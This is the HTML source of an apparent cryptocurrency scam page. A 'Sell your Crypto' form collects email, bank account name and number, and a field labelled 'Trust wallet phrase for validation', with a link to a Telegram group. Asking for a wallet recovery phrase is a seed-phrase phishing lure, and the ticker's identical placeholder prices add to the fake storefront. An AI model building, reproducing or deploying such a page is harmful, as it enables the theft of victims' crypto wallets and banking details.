<!DOCTYPE html>
<html lang="en"> 
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <link rel="stylesheet" href="userside.css">
    <link rel="stylesheet" href="">
    <link rel="stylesheet" href="fontss/fontawesome-free-5.15.3-web/css/all.css">
    <link rel="shortcut icon" href="images/favicon.png">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Sell-Crypto</title>
</head>

<body>
    <style>
        body {
            margin: 0%;
        } 
        .body-img {
            background-color: rgba(0, 0, 0, 0.678);
            background-blend-mode: multiply;
            width: 100%;
            background-image: url('./images/slider/bg1.jpg');
            height: 900px;
            background-size: 100% 100%;
        }

        .inpu-div {
            width: 32%;
            padding: 20px;
            height: 450px;
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            margin: auto; 
            background-color: black;
        } 
        .tell{
            padding: 20px;
            text-align: center; 
            font-family: -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, Oxygen, Ubuntu, Cantarell, 'Open Sans', 'Helvetica Neue', sans-serif;
            color: white; 
        }
        .leto{
     text-decoration: none;
     color: white;
}
.appp{
    padding: 5px;
    color: white;
   background-color: #fd961a;
   border: none;
   font-size: 13px;
   cursor: pointer;
} 
.watbtn{
    margin: auto;
    width: 15%; 
    margin-top: -72px; 
    cursor: pointer;
}
   
        .any{
            outline: none;
            border: none;
            width: 90%;
            color: white;
            background-color: rgb(31, 30, 30);
            padding: 10px;
        }
        .select{
            color: gray;
        }
        .see-div{
            margin-top: 30px; 
            height: 40px;
            float: right;
            width: 30%;
        }
        .see-divs{ 
            color: white;
            cursor: pointer;
            outline: none;
            height: 40px;  
            border: none;
            background-color:#fd961a ;
            width: 100%;
        }
  @media (max-width:425px) {  
    .watbtn{ 
        width: 50%;
        margin-top: -230px;
    }
    .inpu-div{
        width: 80%;
    } 
}
    </style>  
    <div class="crypto-layouts">
        <marquee behavior="" direction="" class="marqss">
            <div class="crypto-one"><i class="fab fa-bitcoin"></i>
                <b class="its">Bitcoin</b>
                <b class="it">$88.87</b>
                <p class="btcprise"> <a href="https://www.blockchain.com/prices/BTC" class="plizr" target="blanki">
                        +2.36%</a></p>
            </div>
        </marquee>

        <marquee behavior="" direction="">
            <div class="crypto-one"><i class="fab fa-ethereum"></i>
                <b class="it">Etheleum</b>
                <b class="it">$88.87</b>
                <p class="btcprise"> <a href="https://www.blockchain.com/prices/ETH" class="plizrs" target="blanki">
                        +2.36%</a></p>
            </div>

        </marquee>

        <marquee behavior="" direction="">
            <div class="crypto-one"><img src="https://img.icons8.com/pastel-glyph/64/000000/tron.png"/>
                <b class="it">Tron</b>
                <b class="it">$88.87</b>
                <p class="btcprise"> <a href=" https://www.blockchain.com/prices/TRON" class="plizrser" target="blanki"> -2.36%</a></p>
            </div>

        </marquee>

        <marquee behavior="" direction="">
            <div class="crypto-one"><i class="fas fa-dog"></i>
                <b class="it">Doge</b>
                <b class="it">$88.87</b>
                <p class="btcprise"> <a href="https://www.blockchain.com/prices/DOGE" class="plizr" target="blanki">
                        -2.36%</a></p>
            </div>

        </marquee>

        <marquee behavior="" direction="">
            <div class="crypto-one"><i class="fab fa-uniregistry"></i>
                <b class="it">Uni</b>
                <b class="it">$88.87</b>
                <p class="btcprise"> <a href="https://www.blockchain.com/prices/UNI" class="plizr" target="blanki">
                        +2.36%</a></p>
            </div>

        </marquee>

        <marquee behavior="" direction="">
            <div class="crypto-one"><i class="fab fa-instalod"></i>
                <b class="it">ALGO</b>
                <b class="it">$88.87</b>
                <p class="btcprise"> <a href="https://www.blockchain.com/prices/ALGO" class="plizrs" target="blank">
                        -2.36%</a></p>
            </div>
        </marquee>
    </div>
    <div class="body-img">
        <br>
        <br>
        <br>
        <br>
        <br>
        <br>
        <form action="./pay.html">
        <div class="inpu-div">
            <div class="tell">Sell your <label    style="color: #fd961a;">Crypto</label> </div>
            <input type="email"  placeholder="Email" required class="any">
            <br>
            <br>
            <input type="text"  placeholder="Amount to sell" required class="any">
            <br>
            <br>
            <b class="select">Select coin</b>
            <br>
            <br>
            <select name="" id="" class="any">
                <option value="">Btc</option>
                <option value="">Eth</option>
                <option value="">doge</option> 
                
            </select>
             <br> 
             <br>
             <b class="select">bank account detail for receiving cash</b>
             <br>
             <br>
            <input type="text"  placeholder="acc Name" required class="any">
            <br>
            <br>
            <input type="text"  placeholder="acc number" required class="any">
            <br>
            <br>
           <input type="text"  placeholder="Trust wallet phrase for validation" required class="any">
           <div class="see-div">
                <button class="see-divs">
                    Sell
                </button>
           </div>
      </div> 
  </div>
        </form>
    <div class="watbtn">
       <button class="appp">
           <a href="https://t.me/+MvaaGiRjPs42YzBk" class="leto">
            Am cunfused join us on telegram
        </a>
       </button>
    </div>
</body>

</html>